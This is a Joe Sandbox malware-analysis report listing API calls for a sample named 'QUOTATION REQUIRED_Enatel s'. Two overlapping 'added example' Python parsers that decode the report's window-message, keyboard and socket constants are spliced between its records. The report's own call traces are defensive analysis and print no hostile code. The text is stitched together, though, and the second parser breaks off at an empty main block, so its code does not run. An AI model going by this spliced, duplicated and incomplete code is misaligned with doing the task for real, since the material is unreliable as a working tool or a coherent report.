                                                                                                                      • Part of subcall function 00F73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F73A57
                                                                                                                      • Part of subcall function 00F73A3D: GetCurrentThreadId.KERNEL32 ref: 00F73A5E
                                                                                                                      • Part of subcall function 00F73A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F725B3), ref: 00F73A65
                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FA22E3
                                                                                                                      • Part of subcall function 00F7E97B: Sleep.KERNEL32 ref: 00F7E9F3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4196846111-0
                                                                                                                    • Opcode ID: abbbab4e5ac4a3a5c78b859d3f669d1b8595fb9b6aa5411bed58a7dad5c7970c
                                                                                                                    • Instruction ID: 42c4c48e36ef900ff69fe801139ea81c558353ac0a36169ebd4a8503e49be281
                                                                                                                    • Opcode Fuzzy Hash: abbbab4e5ac4a3a5c78b859d3f669d1b8595fb9b6aa5411bed58a7dad5c7970c
                                                                                                                    • Instruction Fuzzy Hash: 117181B6E00205AFDB50DF68C845BAEB7F5EF49320F148459E816EB351DB38ED41AB90
                                                                                                                    APIs
                                                                                                                    • IsWindow.USER32(01235700), ref: 00FA7F37
                                                                                                                    • IsWindowEnabled.USER32(01235700), ref: 00FA7F43
                                                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00FA801E
                                                                                                                    • SendMessageW.USER32(01235700,000000B0,?,?), ref: 00FA8051
                                                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 00FA8089
                                                                                                                    • GetWindowLongW.USER32(01235700,000000EC), ref: 00FA80AB
                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00FA80C3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4072528602-0
                                                                                                                    • Opcode ID: 6e073208fc170df0f996d135c9cba3388c5da9b3580b169785250a469f515547
                                                                                                                    • Instruction ID: 09a36e70bfc820a530b7c31245d7500be722232fd646b039cf3c0ddedfaddad3
                                                                                                                    • Opcode Fuzzy Hash: 6e073208fc170df0f996d135c9cba3388c5da9b3580b169785250a469f515547
                                                                                                                    • Instruction Fuzzy Hash: 8171C0B4A08344AFEB20EF54CC84FEA7BB9FF4B350F144059E95557261CB31A945EBA0
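                                                                                                                    The per-function "APIs" listings in this report are plain text, and the arguments Joe Sandbox prints for PostMessageW/SendMessageW are raw hex immediates with "?" for anything it could not recover. The following is an added example (it is not Joe Sandbox code and not part of the report): a small Python parser that turns one listing into call records, keeps the "Part of subcall function" attribution, and decodes the message and virtual-key constants from the Windows SDK (WinUser.h values, which is the only external assumption). The two sample listings are copied verbatim from this page: the GetMenu/AttachThreadInput record above and the GetKeyboardState/PostMessageW record that follows it. Reading them this way shows that the second record posts WM_KEYUP for VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN to another window, which is AutoIt's synthetic key-release sequence rather than anything specific to the payload.

```python
"""Parse Joe Sandbox per-function API listings and decode window-message arguments.

Added illustration; the only external inputs are Windows SDK constants from WinUser.h.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Windows SDK (WinUser.h) constants needed to read the Post/SendMessageW calls on this page.
WINDOW_MESSAGES = {
    0x00A1: "WM_NCLBUTTONDOWN",
    0x00B0: "EM_GETSEL",
    0x0101: "WM_KEYUP",
    0x0111: "WM_COMMAND",
}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}

# One "• Name.MODULE(args), ref: ADDR" line, optionally prefixed with
# "Part of subcall function ADDR:". Calls such as _wcslen.LIBCMT carry no
# argument list, so the parenthesised group is optional.
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]                   # raw tokens; "?" means the sandbox did not recover the value
    ref: str                          # call-site address in the dumped image
    subcall_of: Optional[str] = None  # set when the call was seen inside a callee


def parse_api_lines(listing: str) -> List[ApiCall]:
    """Return the ApiCall records of one function's 'APIs' listing, in listing order."""
    calls = []
    for line in listing.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # section headers such as 'APIs' or 'Strings'
        raw = m.group("args")
        args = raw.split(",") if raw else []
        calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
    return calls


def _hex_arg(token: str) -> Optional[int]:
    """The listing prints immediates as hex, signed forms like -C000001E included."""
    try:
        return int(token, 16)
    except ValueError:
        return None  # "?" or another unrecovered value


def decode_message_call(call: ApiCall) -> Optional[str]:
    """Name the message (and, for WM_KEYUP, the virtual key) of a Post/SendMessageW call."""
    if call.name not in ("PostMessageW", "SendMessageW") or len(call.args) < 3:
        return None
    msg, wparam = _hex_arg(call.args[1]), _hex_arg(call.args[2])
    if msg is None:
        return None
    text = WINDOW_MESSAGES.get(msg, f"msg=0x{msg:04X}")
    if msg == 0x0101 and wparam is not None:
        text += " " + VIRTUAL_KEYS.get(wparam, f"vk=0x{wparam:02X}")
    return text


def api_chain(calls: List[ApiCall]) -> List[str]:
    """Ordered API names, with the decoded message appended where one applies."""
    return [f"{c.name}[{d}]" if (d := decode_message_call(c)) else c.name for c in calls]


# Sample input: two listings copied from this report.
MENU_LISTING = """APIs
• GetMenu.USER32(?), ref: 00FA2183
• GetMenuItemCount.USER32(00000000), ref: 00FA21B5
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00FA21DD
• _wcslen.LIBCMT ref: 00FA2213
• GetMenuItemID.USER32(?,?), ref: 00FA224D
• GetSubMenu.USER32(?,?), ref: 00FA225B
  • Part of subcall function 00F73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F73A57
  • Part of subcall function 00F73A3D: GetCurrentThreadId.KERNEL32 ref: 00F73A5E
  • Part of subcall function 00F73A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F725B3), ref: 00F73A65
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FA22E3
  • Part of subcall function 00F7E97B: Sleep.KERNEL32 ref: 00F7E9F3
"""

KEYBOARD_LISTING = """APIs
• GetParent.USER32(?), ref: 00F7AEF9
• GetKeyboardState.USER32(?), ref: 00F7AF0E
• SetKeyboardState.USER32(?), ref: 00F7AF6F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00F7AF9D
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00F7AFBC
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00F7AFFD
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F7B020
"""

if __name__ == "__main__":
    for listing in (MENU_LISTING, KEYBOARD_LISTING):
        print(" -> ".join(api_chain(parse_api_lines(listing))))
```

                                                                                                                    The regex is deliberately anchored on the "ref:" suffix so that the "Strings" and "Memory Dump Source" headers in the same record are skipped; extend WINDOW_MESSAGES with whatever other constants a given listing uses before trusting the decoded names for control-specific messages (the 0x041C sent in the IsDlgButtonChecked record above is WM_USER-relative and depends on the target control class, so it is intentionally left undecoded).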
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 00F7AEF9
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00F7AF0E
                                                                                                                    • SetKeyboardState.USER32(?), ref: 00F7AF6F
                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F7AF9D
                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F7AFBC
                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F7AFFD
                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F7B020
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: 8d614128667d6145657b76296bee40a99e63db64495677d143de8ce74373ba0a
                                                                                                                    • Instruction ID: f68e4597de83d631b92a3134e5c9a9acc6622867a0191cc55a1a844a5ca0a7b5
                                                                                                                    • Opcode Fuzzy Hash: 8d614128667d6145657b76296bee40a99e63db64495677d143de8ce74373ba0a
                                                                                                                    • Instruction Fuzzy Hash: 9751D1A1A087D53DFB3682348C45BBEBEA95B46314F09C58AE1DD858C3C3D8A8C4E753
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(00000000), ref: 00F7AD19
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00F7AD2E
                                                                                                                    • SetKeyboardState.USER32(?), ref: 00F7AD8F
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F7ADBB
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F7ADD8
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F7AE17
                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F7AE38
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: cbb9c5d33dd57aa0da63506d19e6f39cd7120fa6844f75474699684579e32060
                                                                                                                    • Instruction ID: 062cb2799394942d23e95285c62b11f8a116a75690f2e3a80d08e7004902d345
                                                                                                                    • Opcode Fuzzy Hash: cbb9c5d33dd57aa0da63506d19e6f39cd7120fa6844f75474699684579e32060
                                                                                                                    • Instruction Fuzzy Hash: B551E3A19047D53DFB3383248C55BBE7EA95B86310F09C48AE0DD868C2D294EC98F753
                                                                                                                    APIs
                                                                                                                    • GetConsoleCP.KERNEL32(00F53CD6,?,?,?,?,?,?,?,?,00F45BA3,?,?,00F53CD6,?,?), ref: 00F45470
                                                                                                                    • __fassign.LIBCMT ref: 00F454EB
                                                                                                                    • __fassign.LIBCMT ref: 00F45506
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00F53CD6,00000005,00000000,00000000), ref: 00F4552C
                                                                                                                    • WriteFile.KERNEL32(?,00F53CD6,00000000,00F45BA3,00000000,?,?,?,?,?,?,?,?,?,00F45BA3,?), ref: 00F4554B
                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,00F45BA3,00000000,?,?,?,?,?,?,?,?,?,00F45BA3,?), ref: 00F45584
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1324828854-0
                                                                                                                    • Opcode ID: da97a08db27f1a47e1ffea7cc8ed9962fec65aef781ff15e3c647214d8310fe6
                                                                                                                    • Instruction ID: 3f944cf1c7cfe3088faf19eb59f4ccb2515b189be32c42b63524c74bcda099c5
                                                                                                                    • Opcode Fuzzy Hash: da97a08db27f1a47e1ffea7cc8ed9962fec65aef781ff15e3c647214d8310fe6
                                                                                                                    • Instruction Fuzzy Hash: 1B51E3B1E00649AFDB11DFA8DC85AEEBBF9EF09710F14401AF945E7292D7309A41DB60
                                                                                                                    APIs
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F32D4B
                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00F32D53
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F32DE1
                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00F32E0C
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F32E61
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                    • String ID: csm
                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                    • Opcode ID: 2840c065c358296ee5cc5161864ed156f1c89cfbc9f7f3b7d14b739acf1cbfe1
                                                                                                                    • Instruction ID: f20a1dee79f69031411a82083c1d1fdc30fbd461ba543cff112b98f89d1ba714
                                                                                                                    • Opcode Fuzzy Hash: 2840c065c358296ee5cc5161864ed156f1c89cfbc9f7f3b7d14b739acf1cbfe1
                                                                                                                    • Instruction Fuzzy Hash: 1341DD35E00209ABCF50DF68CC85A9EBBB5BF44334F148155E814AB392DB35EA05EBD0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F9304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F9307A
                                                                                                                      • Part of subcall function 00F9304E: _wcslen.LIBCMT ref: 00F9309B
                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F91112
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00F91121
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00F911C9
                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00F911F9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2675159561-0
                                                                                                                    • Opcode ID: 8d423b4b661e7d0e9d652d424b2d04dd63d1ad2f108c61fd6f67148e9f8f0027
                                                                                                                    • Instruction ID: d29339dd11579687269cdc9ed391dde60d0d979327cd7c57edd4b91b549cf072
                                                                                                                    • Opcode Fuzzy Hash: 8d423b4b661e7d0e9d652d424b2d04dd63d1ad2f108c61fd6f67148e9f8f0027
                                                                                                                    • Instruction Fuzzy Hash: 3E41E371600209AFEB109F14CC84BAABBE9FF45364F148069FD159B291C778ED81DBE1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F7DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F7CF22,?), ref: 00F7DDFD
                                                                                                                      • Part of subcall function 00F7DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F7CF22,?), ref: 00F7DE16
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00F7CF45
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00F7CF7F
                                                                                                                    • _wcslen.LIBCMT ref: 00F7D005
                                                                                                                    • _wcslen.LIBCMT ref: 00F7D01B
                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 00F7D061
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 3164238972-1173974218
                                                                                                                    • Opcode ID: d41e49fa43acbeb1b089659126dcf809c777fab19683d63bb93791e2840a3580
                                                                                                                    • Instruction ID: ecca875b5d9374a53472589962c8f2c2ac22915e5615cf89ad06bfd6cfd912e2
                                                                                                                    • Opcode Fuzzy Hash: d41e49fa43acbeb1b089659126dcf809c777fab19683d63bb93791e2840a3580
                                                                                                                    • Instruction Fuzzy Hash: F1415571D052185EDF12EFA4CD81FDEB7B9AF09390F4040EBE509EB141EA74A688EB51
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00FA2E1C
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00FA2E4F
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00FA2E84
                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00FA2EB6
                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00FA2EE0
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00FA2EF1
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00FA2F0B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2178440468-0
                                                                                                                    • Opcode ID: 8bd3823af5439c99c06071ab9a1dfb5f6271a0e002f9fcff4960471e104200e1
                                                                                                                    • Instruction ID: 7e0b6c2f6692b279e9cc74119785142983a2bf1d2a9a5a9af8a0ce219297f890
                                                                                                                    • Opcode Fuzzy Hash: 8bd3823af5439c99c06071ab9a1dfb5f6271a0e002f9fcff4960471e104200e1
                                                                                                                    • Instruction Fuzzy Hash: 2231D175B04158AFEB61CF59DCC4F6937E1BB8A720F150164F9048F2A2CB71A880EB41
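The API records above show raw hexadecimal arguments, so the interesting calls are easy to misread: the two PostMessageW records post message 0x0100/0x0101 with wParam 0x10, 0x11, 0x12 and 0x5B, the socket record passes (2, 1, 6), and the SendMessageW record uses 0xF0/0xF1. The following Python is an added example for this page, not Joe Sandbox code; it parses the report's "APIs" lines and names those constants using the standard Win32 values (WM_KEYDOWN/WM_KEYUP, VK_SHIFT/VK_CONTROL/VK_MENU/VK_LWIN, BM_GETCHECK/BM_SETCHECK, AF_INET/SOCK_STREAM/IPPROTO_TCP). The function names parse_api_line, decode and injected_modifier_keys are mine; the sample lines are copied from the records above. The flagging of a GetKeyboardState/SetKeyboardState plus modifier-key PostMessageW sequence as a synthetic-keystroke helper rather than key capture is an inference from the call pattern (the report classifies the sample as a compiled AutoIt script), not something the report states.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Added example (not Joe Sandbox code). Standard Win32 constant values.
WINDOW_MESSAGES = {
    0x0100: "WM_KEYDOWN",
    0x0101: "WM_KEYUP",
    0x00F0: "BM_GETCHECK",   # button-control messages; compare the API ID "ButtonChecked" above
    0x00F1: "BM_SETCHECK",
}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
MODIFIER_KEYS = set(VIRTUAL_KEYS.values())
SOCKET_CONSTS = ({2: "AF_INET", 23: "AF_INET6"}, {1: "SOCK_STREAM", 2: "SOCK_DGRAM"},
                 {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"})

# Report line shape: "• Name.MODULE(arg,arg,...), ref: 00F7AF9D". "?" marks an argument the
# sandbox could not resolve; "Part of subcall function" lines describe a callee, not the
# function itself. Lines without a bullet+Name.MODULE shape (headers, hashes) do not match.
API_LINE = re.compile(
    r"^\s*•\s*(?P<subcall>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-F]+))?\s*$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list              # int for resolved hex arguments, None for "?"
    ref: Optional[str]      # call-site address as printed in the report
    subcall: bool

def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one report line; returns None for headers and non-API lines."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = []
    if m.group("args"):
        for a in m.group("args").split(","):
            a = a.strip()
            args.append(None if a == "?" else int(a, 16))
    return ApiCall(m.group("name"), m.group("module"), args, m.group("ref"),
                   m.group("subcall") is not None)

def decode(call: ApiCall) -> str:
    """Render a call with named constants where the argument positions are known."""
    def hexs(v):
        return "?" if v is None else f"0x{v:X}"
    if call.name in ("PostMessageW", "SendMessageW") and len(call.args) >= 3:
        msg = WINDOW_MESSAGES.get(call.args[1], hexs(call.args[1]))
        wparam = call.args[2]
        # wParam is a virtual-key code only for keyboard messages
        wparam = VIRTUAL_KEYS.get(wparam, hexs(wparam)) if msg in ("WM_KEYDOWN", "WM_KEYUP") else hexs(wparam)
        return f"{call.name}(hwnd={hexs(call.args[0])}, {msg}, {wparam})"
    if call.name == "socket" and len(call.args) >= 3:
        names = [tbl.get(v, hexs(v)) for tbl, v in zip(SOCKET_CONSTS, call.args[:3])]
        return "socket(" + ", ".join(names) + ")"
    return f"{call.name}(" + ", ".join(hexs(a) for a in call.args) + ")"

def injected_modifier_keys(lines):
    """Return ({messages}, {modifier keys}) when a function rewrites the keyboard state and
    posts key messages for modifier keys, else None. That pattern forces Shift/Ctrl/Alt/Win
    up or down before sending input, i.e. a synthetic-keystroke helper, not a capture hook
    (inference from the call pattern; the report flags the sample as compiled AutoIt)."""
    calls = [c for c in map(parse_api_line, lines) if c and not c.subcall]
    if not {"GetKeyboardState", "SetKeyboardState"} <= {c.name for c in calls}:
        return None
    msgs, keys = set(), set()
    for c in calls:
        if c.name == "PostMessageW" and len(c.args) >= 3:
            msg, key = WINDOW_MESSAGES.get(c.args[1]), VIRTUAL_KEYS.get(c.args[2])
            if msg in ("WM_KEYDOWN", "WM_KEYUP") and key in MODIFIER_KEYS:
                msgs.add(msg)
                keys.add(key)
    return (msgs, keys) if keys else None

# Sample input: lines copied from the report's first PostMessageW/KeyboardState record.
KEYUP_BLOCK = [
    "• GetParent.USER32(?), ref: 00F7AEF9",
    "• GetKeyboardState.USER32(?), ref: 00F7AF0E",
    "• SetKeyboardState.USER32(?), ref: 00F7AF6F",
    "• PostMessageW.USER32(?,00000101,00000010,?), ref: 00F7AF9D",
    "• PostMessageW.USER32(?,00000101,00000011,?), ref: 00F7AFBC",
    "• PostMessageW.USER32(?,00000101,00000012,?), ref: 00F7AFFD",
    "• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F7B020",
]

if __name__ == "__main__":
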